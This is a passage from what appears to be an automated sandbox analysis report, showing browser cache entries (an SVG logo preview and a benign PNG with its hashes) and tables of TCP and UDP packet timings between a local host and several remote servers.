Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.

Chrome Cache Entry: 80

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 56 x 16, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	425
Entropy (8bit):	7.183054355813181
Encrypted:	false
SSDEEP:	12:6v/7K/cQoX/pfVlQJ9uh7NL6bWSlvAlM2qlkc:EQoXpVG9r6Sfz
MD5:	167B698229F1277572AEE79D0ADD5B8D
SHA1:	230E71F479581AE5025186B6996AC92D65FFF220
SHA-256:	6B7695FC59EF2D66CF1BDFD3D475F6254650F8825CDC29AF80260EDA0F64237B
SHA-512:	CF8CAA570B585EF04972AFE120E6F69B787EE29EC04DF65928CF43FA3657D250ED55812DD76052E80F4EE773F34E2DEE5F666146AC647CF26F998EBECF7DEB0E
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...8...........+.....sRGB.........gAMA......a.....pHYs..........o.d...>IDATHK.Q..0.....{.].B.2.....Ew.w...i...(.A..2.&_....#2A..2..=.m....ic.}fKZ.q:h......oR\|....6.cu.."..R/.....cjP.}.>.]...s..%.J.vt..L#.......AL7N......(@.40!P.o.T.-....x......(:G.'.P_.KT.Zo'.@U.b..4.h.wPKP....R......Qr.$...h.V....UP...hf..2rEP..5.@#P.<n.D..=.>U%@.S[....z..K...)A..r..)E.._...c.~......m..x.@.?....(....IEND.B`.

Static File Info

⊘No static file info

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 23, 2024 00:15:58.298130989 CEST	49678	443	192.168.2.4	104.46.162.224
May 23, 2024 00:15:59.766808987 CEST	49675	443	192.168.2.4	173.222.162.32
May 23, 2024 00:16:08.821288109 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:08.821357965 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:08.821438074 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:08.821563959 CEST	49736	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:08.821656942 CEST	443	49736	209.94.90.1	192.168.2.4
May 23, 2024 00:16:08.821721077 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:08.821757078 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:08.821794987 CEST	49736	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:08.821949005 CEST	49736	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:08.821974039 CEST	443	49736	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.324644089 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.324961901 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.324992895 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.326436043 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.326498985 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.327641010 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.327723026 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.327801943 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.327811956 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.328548908 CEST	443	49736	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.328927994 CEST	49736	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.328958035 CEST	443	49736	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.329960108 CEST	443	49736	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.330013037 CEST	49736	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.331372023 CEST	49736	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.331438065 CEST	443	49736	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.377062082 CEST	49675	443	192.168.2.4	173.222.162.32
May 23, 2024 00:16:09.377065897 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.377096891 CEST	49736	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.377156019 CEST	443	49736	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.422720909 CEST	49736	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.449527025 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.450298071 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.450375080 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.450402021 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.453365088 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.453425884 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.453435898 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.453521967 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.453567982 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.453577995 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.457326889 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.457392931 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.457401991 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.458395004 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.458461046 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.458470106 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.461193085 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.461258888 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.461267948 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.510895967 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.510917902 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.539127111 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.539165020 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.539196014 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.539206982 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.539247036 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.541105986 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.543255091 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.543288946 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.543313980 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.543324947 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.543365002 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.543373108 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.547159910 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.547195911 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.547223091 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.547231913 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.547281027 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.548769951 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.550339937 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.550373077 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.550400972 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.550409079 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.550446987 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.551939011 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.553523064 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.553565025 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.553565025 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.553576946 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.553615093 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.554903984 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.555632114 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.555672884 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.555680990 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.557678938 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.557728052 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.557735920 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.559746981 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.559797049 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.559803963 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.600277901 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.626720905 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.633306026 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:09.633497953 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.662323952 CEST	49735	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:09.662358999 CEST	443	49735	209.94.90.1	192.168.2.4
May 23, 2024 00:16:10.680973053 CEST	49746	443	192.168.2.4	142.250.184.228
May 23, 2024 00:16:10.681009054 CEST	443	49746	142.250.184.228	192.168.2.4
May 23, 2024 00:16:10.681061983 CEST	49746	443	192.168.2.4	142.250.184.228
May 23, 2024 00:16:10.681755066 CEST	49746	443	192.168.2.4	142.250.184.228
May 23, 2024 00:16:10.681771994 CEST	443	49746	142.250.184.228	192.168.2.4
May 23, 2024 00:16:10.887552023 CEST	49753	443	192.168.2.4	192.229.221.185
May 23, 2024 00:16:10.887584925 CEST	443	49753	192.229.221.185	192.168.2.4
May 23, 2024 00:16:10.887643099 CEST	49753	443	192.168.2.4	192.229.221.185
May 23, 2024 00:16:10.887979031 CEST	49753	443	192.168.2.4	192.229.221.185
May 23, 2024 00:16:10.887999058 CEST	443	49753	192.229.221.185	192.168.2.4
May 23, 2024 00:16:11.366091967 CEST	443	49746	142.250.184.228	192.168.2.4
May 23, 2024 00:16:11.366344929 CEST	49746	443	192.168.2.4	142.250.184.228
May 23, 2024 00:16:11.366373062 CEST	443	49746	142.250.184.228	192.168.2.4
May 23, 2024 00:16:11.367239952 CEST	443	49746	142.250.184.228	192.168.2.4
May 23, 2024 00:16:11.367311954 CEST	49746	443	192.168.2.4	142.250.184.228
May 23, 2024 00:16:11.543601990 CEST	49757	443	192.168.2.4	2.19.104.72
May 23, 2024 00:16:11.543622971 CEST	443	49757	2.19.104.72	192.168.2.4
May 23, 2024 00:16:11.543833017 CEST	49757	443	192.168.2.4	2.19.104.72
May 23, 2024 00:16:11.545439005 CEST	49757	443	192.168.2.4	2.19.104.72
May 23, 2024 00:16:11.545449018 CEST	443	49757	2.19.104.72	192.168.2.4
May 23, 2024 00:16:11.578243971 CEST	49746	443	192.168.2.4	142.250.184.228
May 23, 2024 00:16:11.578387022 CEST	443	49746	142.250.184.228	192.168.2.4
May 23, 2024 00:16:11.625341892 CEST	49746	443	192.168.2.4	142.250.184.228
May 23, 2024 00:16:11.625374079 CEST	443	49746	142.250.184.228	192.168.2.4
May 23, 2024 00:16:11.671536922 CEST	49746	443	192.168.2.4	142.250.184.228
May 23, 2024 00:16:11.841672897 CEST	443	49753	192.229.221.185	192.168.2.4
May 23, 2024 00:16:11.893403053 CEST	49753	443	192.168.2.4	192.229.221.185
May 23, 2024 00:16:11.979728937 CEST	49753	443	192.168.2.4	192.229.221.185
May 23, 2024 00:16:11.979758024 CEST	443	49753	192.229.221.185	192.168.2.4
May 23, 2024 00:16:11.980947971 CEST	443	49753	192.229.221.185	192.168.2.4
May 23, 2024 00:16:11.980964899 CEST	443	49753	192.229.221.185	192.168.2.4
May 23, 2024 00:16:11.981034994 CEST	49753	443	192.168.2.4	192.229.221.185
May 23, 2024 00:16:11.985430002 CEST	49753	443	192.168.2.4	192.229.221.185
May 23, 2024 00:16:11.985518932 CEST	443	49753	192.229.221.185	192.168.2.4
May 23, 2024 00:16:11.986466885 CEST	49753	443	192.168.2.4	192.229.221.185
May 23, 2024 00:16:11.986495018 CEST	443	49753	192.229.221.185	192.168.2.4
May 23, 2024 00:16:12.030570984 CEST	49753	443	192.168.2.4	192.229.221.185
May 23, 2024 00:16:12.175477028 CEST	443	49753	192.229.221.185	192.168.2.4
May 23, 2024 00:16:12.183413982 CEST	443	49753	192.229.221.185	192.168.2.4
May 23, 2024 00:16:12.183473110 CEST	49753	443	192.168.2.4	192.229.221.185
May 23, 2024 00:16:12.183475971 CEST	443	49753	192.229.221.185	192.168.2.4
May 23, 2024 00:16:12.183506966 CEST	49753	443	192.168.2.4	192.229.221.185
May 23, 2024 00:16:12.189135075 CEST	49753	443	192.168.2.4	192.229.221.185
May 23, 2024 00:16:12.189152956 CEST	443	49753	192.229.221.185	192.168.2.4
May 23, 2024 00:16:12.213731050 CEST	443	49757	2.19.104.72	192.168.2.4
May 23, 2024 00:16:12.213809013 CEST	49757	443	192.168.2.4	2.19.104.72
May 23, 2024 00:16:12.216630936 CEST	49736	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:12.224350929 CEST	49757	443	192.168.2.4	2.19.104.72
May 23, 2024 00:16:12.224363089 CEST	443	49757	2.19.104.72	192.168.2.4
May 23, 2024 00:16:12.224648952 CEST	443	49757	2.19.104.72	192.168.2.4
May 23, 2024 00:16:12.258531094 CEST	443	49736	209.94.90.1	192.168.2.4
May 23, 2024 00:16:12.267313004 CEST	49757	443	192.168.2.4	2.19.104.72
May 23, 2024 00:16:12.345407009 CEST	443	49736	209.94.90.1	192.168.2.4
May 23, 2024 00:16:12.345520973 CEST	443	49736	209.94.90.1	192.168.2.4
May 23, 2024 00:16:12.345565081 CEST	49736	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:12.346470118 CEST	49736	443	192.168.2.4	209.94.90.1
May 23, 2024 00:16:12.346493959 CEST	443	49736	209.94.90.1	192.168.2.4
May 23, 2024 00:16:12.388937950 CEST	49757	443	192.168.2.4	2.19.104.72
May 23, 2024 00:16:12.397134066 CEST	49770	443	192.168.2.4	169.150.247.39
May 23, 2024 00:16:12.397166967 CEST	443	49770	169.150.247.39	192.168.2.4
May 23, 2024 00:16:12.397216082 CEST	49770	443	192.168.2.4	169.150.247.39
May 23, 2024 00:16:12.397552967 CEST	49770	443	192.168.2.4	169.150.247.39
May 23, 2024 00:16:12.397567987 CEST	443	49770	169.150.247.39	192.168.2.4
May 23, 2024 00:16:12.430500031 CEST	443	49757	2.19.104.72	192.168.2.4
May 23, 2024 00:16:12.569004059 CEST	443	49757	2.19.104.72	192.168.2.4
May 23, 2024 00:16:12.569075108 CEST	443	49757	2.19.104.72	192.168.2.4
May 23, 2024 00:16:12.569132090 CEST	49757	443	192.168.2.4	2.19.104.72
May 23, 2024 00:16:12.577132940 CEST	49757	443	192.168.2.4	2.19.104.72
May 23, 2024 00:16:12.577155113 CEST	443	49757	2.19.104.72	192.168.2.4
May 23, 2024 00:16:12.700560093 CEST	49771	443	192.168.2.4	192.229.221.185
May 23, 2024 00:16:12.700653076 CEST	443	49771	192.229.221.185	192.168.2.4
May 23, 2024 00:16:12.700746059 CEST	49771	443	192.168.2.4	192.229.221.185
May 23, 2024 00:16:12.701245070 CEST	49771	443	192.168.2.4	192.229.221.185
May 23, 2024 00:16:12.701277971 CEST	443	49771	192.229.221.185	192.168.2.4
May 23, 2024 00:16:12.786133051 CEST	49773	443	192.168.2.4	2.19.104.72
May 23, 2024 00:16:12.786225080 CEST	443	49773	2.19.104.72	192.168.2.4
May 23, 2024 00:16:12.786303997 CEST	49773	443	192.168.2.4	2.19.104.72
May 23, 2024 00:16:12.786824942 CEST	49773	443	192.168.2.4	2.19.104.72
May 23, 2024 00:16:12.786851883 CEST	443	49773	2.19.104.72	192.168.2.4
May 23, 2024 00:16:13.175849915 CEST	443	49770	169.150.247.39	192.168.2.4
May 23, 2024 00:16:13.176117897 CEST	49770	443	192.168.2.4	169.150.247.39
May 23, 2024 00:16:13.176137924 CEST	443	49770	169.150.247.39	192.168.2.4
May 23, 2024 00:16:13.177323103 CEST	443	49770	169.150.247.39	192.168.2.4
May 23, 2024 00:16:13.177382946 CEST	49770	443	192.168.2.4	169.150.247.39
May 23, 2024 00:16:13.350792885 CEST	49770	443	192.168.2.4	169.150.247.39
May 23, 2024 00:16:13.350984097 CEST	443	49770	169.150.247.39	192.168.2.4
May 23, 2024 00:16:13.351577997 CEST	49770	443	192.168.2.4	169.150.247.39
May 23, 2024 00:16:13.351624012 CEST	443	49770	169.150.247.39	192.168.2.4
May 23, 2024 00:16:13.406060934 CEST	49770	443	192.168.2.4	169.150.247.39
May 23, 2024 00:16:13.481182098 CEST	443	49773	2.19.104.72	192.168.2.4
May 23, 2024 00:16:13.481487989 CEST	49773	443	192.168.2.4	2.19.104.72
May 23, 2024 00:16:13.504195929 CEST	49773	443	192.168.2.4	2.19.104.72
May 23, 2024 00:16:13.504225016 CEST	443	49773	2.19.104.72	192.168.2.4
May 23, 2024 00:16:13.504545927 CEST	443	49773	2.19.104.72	192.168.2.4
May 23, 2024 00:16:13.508384943 CEST	49773	443	192.168.2.4	2.19.104.72
May 23, 2024 00:16:13.542001009 CEST	443	49770	169.150.247.39	192.168.2.4
May 23, 2024 00:16:13.554495096 CEST	443	49773	2.19.104.72	192.168.2.4
May 23, 2024 00:16:13.575577974 CEST	443	49770	169.150.247.39	192.168.2.4
May 23, 2024 00:16:13.575609922 CEST	443	49770	169.150.247.39	192.168.2.4
May 23, 2024 00:16:13.575678110 CEST	443	49770	169.150.247.39	192.168.2.4
May 23, 2024 00:16:13.575696945 CEST	49770	443	192.168.2.4	169.150.247.39
May 23, 2024 00:16:13.575723886 CEST	443	49770	169.150.247.39	192.168.2.4
May 23, 2024 00:16:13.575737000 CEST	49770	443	192.168.2.4	169.150.247.39
May 23, 2024 00:16:13.575737953 CEST	49770	443	192.168.2.4	169.150.247.39
May 23, 2024 00:16:13.575747013 CEST	443	49770	169.150.247.39	192.168.2.4
May 23, 2024 00:16:13.575764894 CEST	443	49770	169.150.247.39	192.168.2.4
May 23, 2024 00:16:13.575777054 CEST	49770	443	192.168.2.4	169.150.247.39
May 23, 2024 00:16:13.575892925 CEST	49770	443	192.168.2.4	169.150.247.39
May 23, 2024 00:16:13.575903893 CEST	443	49770	169.150.247.39	192.168.2.4
May 23, 2024 00:16:13.575965881 CEST	443	49770	169.150.247.39	192.168.2.4
May 23, 2024 00:16:13.576602936 CEST	49770	443	192.168.2.4	169.150.247.39
May 23, 2024 00:16:13.583987951 CEST	49770	443	192.168.2.4	169.150.247.39
May 23, 2024 00:16:13.584002972 CEST	443	49770	169.150.247.39	192.168.2.4
May 23, 2024 00:16:13.584033012 CEST	49770	443	192.168.2.4	169.150.247.39
May 23, 2024 00:16:13.584105015 CEST	49770	443	192.168.2.4	169.150.247.39
May 23, 2024 00:16:13.635054111 CEST	49778	443	192.168.2.4	185.93.3.244
May 23, 2024 00:16:13.635099888 CEST	443	49778	185.93.3.244	192.168.2.4
May 23, 2024 00:16:13.637161016 CEST	49778	443	192.168.2.4	185.93.3.244
May 23, 2024 00:16:13.638777971 CEST	49778	443	192.168.2.4	185.93.3.244
May 23, 2024 00:16:13.638813972 CEST	443	49778	185.93.3.244	192.168.2.4
May 23, 2024 00:16:13.641067028 CEST	443	49771	192.229.221.185	192.168.2.4
May 23, 2024 00:16:13.641844988 CEST	49771	443	192.168.2.4	192.229.221.185
May 23, 2024 00:16:13.641870022 CEST	443	49771	192.229.221.185	192.168.2.4
May 23, 2024 00:16:13.642963886 CEST	443	49771	192.229.221.185	192.168.2.4
May 23, 2024 00:16:13.643277884 CEST	49771	443	192.168.2.4	192.229.221.185
May 23, 2024 00:16:13.644063950 CEST	49771	443	192.168.2.4	192.229.221.185
May 23, 2024 00:16:13.644129992 CEST	443	49771	192.229.221.185	192.168.2.4
May 23, 2024 00:16:13.646653891 CEST	49771	443	192.168.2.4	192.229.221.185
May 23, 2024 00:16:13.646665096 CEST	443	49771	192.229.221.185	192.168.2.4
May 23, 2024 00:16:13.688663006 CEST	49771	443	192.168.2.4	192.229.221.185
May 23, 2024 00:16:13.809303999 CEST	443	49773	2.19.104.72	192.168.2.4
May 23, 2024 00:16:13.809377909 CEST	443	49773	2.19.104.72	192.168.2.4
May 23, 2024 00:16:13.811485052 CEST	49773	443	192.168.2.4	2.19.104.72
May 23, 2024 00:16:13.811603069 CEST	49773	443	192.168.2.4	2.19.104.72
May 23, 2024 00:16:13.811603069 CEST	49773	443	192.168.2.4	2.19.104.72
May 23, 2024 00:16:13.811621904 CEST	443	49773	2.19.104.72	192.168.2.4
May 23, 2024 00:16:13.811631918 CEST	443	49773	2.19.104.72	192.168.2.4
May 23, 2024 00:16:13.964181900 CEST	443	49771	192.229.221.185	192.168.2.4
May 23, 2024 00:16:13.970627069 CEST	443	49771	192.229.221.185	192.168.2.4
May 23, 2024 00:16:13.970700026 CEST	443	49771	192.229.221.185	192.168.2.4
May 23, 2024 00:16:13.970726967 CEST	49771	443	192.168.2.4	192.229.221.185
May 23, 2024 00:16:13.970766068 CEST	49771	443	192.168.2.4	192.229.221.185
May 23, 2024 00:16:13.971067905 CEST	49771	443	192.168.2.4	192.229.221.185
May 23, 2024 00:16:13.971091986 CEST	443	49771	192.229.221.185	192.168.2.4
May 23, 2024 00:16:14.437175989 CEST	443	49778	185.93.3.244	192.168.2.4
May 23, 2024 00:16:14.466835022 CEST	49778	443	192.168.2.4	185.93.3.244
May 23, 2024 00:16:14.466886997 CEST	443	49778	185.93.3.244	192.168.2.4
May 23, 2024 00:16:14.470704079 CEST	443	49778	185.93.3.244	192.168.2.4
May 23, 2024 00:16:14.470778942 CEST	49778	443	192.168.2.4	185.93.3.244
May 23, 2024 00:16:14.571010113 CEST	49778	443	192.168.2.4	185.93.3.244
May 23, 2024 00:16:14.571424007 CEST	49778	443	192.168.2.4	185.93.3.244
May 23, 2024 00:16:14.571521997 CEST	443	49778	185.93.3.244	192.168.2.4
May 23, 2024 00:16:14.626211882 CEST	49778	443	192.168.2.4	185.93.3.244
May 23, 2024 00:16:14.626235008 CEST	443	49778	185.93.3.244	192.168.2.4
May 23, 2024 00:16:14.673086882 CEST	49778	443	192.168.2.4	185.93.3.244
May 23, 2024 00:16:14.782005072 CEST	443	49778	185.93.3.244	192.168.2.4
May 23, 2024 00:16:14.829344988 CEST	49778	443	192.168.2.4	185.93.3.244
May 23, 2024 00:16:14.829365015 CEST	443	49778	185.93.3.244	192.168.2.4
May 23, 2024 00:16:14.836806059 CEST	443	49778	185.93.3.244	192.168.2.4
May 23, 2024 00:16:14.836817980 CEST	443	49778	185.93.3.244	192.168.2.4
May 23, 2024 00:16:14.836842060 CEST	443	49778	185.93.3.244	192.168.2.4
May 23, 2024 00:16:14.836854935 CEST	443	49778	185.93.3.244	192.168.2.4
May 23, 2024 00:16:14.836865902 CEST	443	49778	185.93.3.244	192.168.2.4
May 23, 2024 00:16:14.836869001 CEST	49778	443	192.168.2.4	185.93.3.244
May 23, 2024 00:16:14.836883068 CEST	443	49778	185.93.3.244	192.168.2.4
May 23, 2024 00:16:14.836903095 CEST	49778	443	192.168.2.4	185.93.3.244
May 23, 2024 00:16:14.836922884 CEST	49778	443	192.168.2.4	185.93.3.244
May 23, 2024 00:16:14.836961031 CEST	443	49778	185.93.3.244	192.168.2.4
May 23, 2024 00:16:14.837007046 CEST	49778	443	192.168.2.4	185.93.3.244
May 23, 2024 00:16:14.837753057 CEST	49778	443	192.168.2.4	185.93.3.244
May 23, 2024 00:16:14.837774038 CEST	443	49778	185.93.3.244	192.168.2.4
May 23, 2024 00:16:21.261393070 CEST	443	49746	142.250.184.228	192.168.2.4
May 23, 2024 00:16:21.261581898 CEST	443	49746	142.250.184.228	192.168.2.4
May 23, 2024 00:16:21.261640072 CEST	49746	443	192.168.2.4	142.250.184.228
May 23, 2024 00:16:23.173765898 CEST	49746	443	192.168.2.4	142.250.184.228
May 23, 2024 00:16:23.173834085 CEST	443	49746	142.250.184.228	192.168.2.4
May 23, 2024 00:17:11.087673903 CEST	49787	443	192.168.2.4	142.250.184.228
May 23, 2024 00:17:11.087718964 CEST	443	49787	142.250.184.228	192.168.2.4
May 23, 2024 00:17:11.088222027 CEST	49787	443	192.168.2.4	142.250.184.228
May 23, 2024 00:17:11.088222027 CEST	49787	443	192.168.2.4	142.250.184.228
May 23, 2024 00:17:11.088258028 CEST	443	49787	142.250.184.228	192.168.2.4
May 23, 2024 00:17:11.761876106 CEST	443	49787	142.250.184.228	192.168.2.4
May 23, 2024 00:17:11.762509108 CEST	49787	443	192.168.2.4	142.250.184.228
May 23, 2024 00:17:11.762533903 CEST	443	49787	142.250.184.228	192.168.2.4
May 23, 2024 00:17:11.762845993 CEST	443	49787	142.250.184.228	192.168.2.4
May 23, 2024 00:17:11.763726950 CEST	49787	443	192.168.2.4	142.250.184.228
May 23, 2024 00:17:11.763782978 CEST	443	49787	142.250.184.228	192.168.2.4
May 23, 2024 00:17:11.813611984 CEST	49787	443	192.168.2.4	142.250.184.228
May 23, 2024 00:17:21.677061081 CEST	443	49787	142.250.184.228	192.168.2.4
May 23, 2024 00:17:21.677134991 CEST	443	49787	142.250.184.228	192.168.2.4
May 23, 2024 00:17:21.679229021 CEST	49787	443	192.168.2.4	142.250.184.228
May 23, 2024 00:17:23.183331966 CEST	49787	443	192.168.2.4	142.250.184.228
May 23, 2024 00:17:23.183382034 CEST	443	49787	142.250.184.228	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 23, 2024 00:16:07.046619892 CEST	53	49518	1.1.1.1	192.168.2.4
May 23, 2024 00:16:07.046700001 CEST	53	50119	1.1.1.1	192.168.2.4
May 23, 2024 00:16:08.095112085 CEST	53	53345	1.1.1.1	192.168.2.4
May 23, 2024 00:16:08.803082943 CEST	65411	53	192.168.2.4	1.1.1.1
May 23, 2024 00:16:08.803209066 CEST	56250	53	192.168.2.4	1.1.1.1
May 23, 2024 00:16:08.811923981 CEST	53	65411	1.1.1.1	192.168.2.4
May 23, 2024 00:16:08.820813894 CEST	53	56250	1.1.1.1	192.168.2.4
May 23, 2024 00:16:09.467981100 CEST	60861	53	192.168.2.4	1.1.1.1
May 23, 2024 00:16:09.468605995 CEST	57190	53	192.168.2.4	1.1.1.1
May 23, 2024 00:16:09.520101070 CEST	53	57190	1.1.1.1	192.168.2.4
May 23, 2024 00:16:09.520123959 CEST	53	54815	1.1.1.1	192.168.2.4
May 23, 2024 00:16:09.672996044 CEST	57553	53	192.168.2.4	1.1.1.1
May 23, 2024 00:16:09.673105001 CEST	64506	53	192.168.2.4	1.1.1.1
May 23, 2024 00:16:09.736907959 CEST	53	64506	1.1.1.1	192.168.2.4
May 23, 2024 00:16:10.655879021 CEST	51873	53	192.168.2.4	1.1.1.1
May 23, 2024 00:16:10.656202078 CEST	62450	53	192.168.2.4	1.1.1.1
May 23, 2024 00:16:10.679303885 CEST	53	51873	1.1.1.1	192.168.2.4
May 23, 2024 00:16:10.679323912 CEST	53	62450	1.1.1.1	192.168.2.4
May 23, 2024 00:16:10.690057993 CEST	58498	53	192.168.2.4	1.1.1.1
May 23, 2024 00:16:10.690227032 CEST	58892	53	192.168.2.4	1.1.1.1
May 23, 2024 00:16:10.706856012 CEST	53	58892	1.1.1.1	192.168.2.4
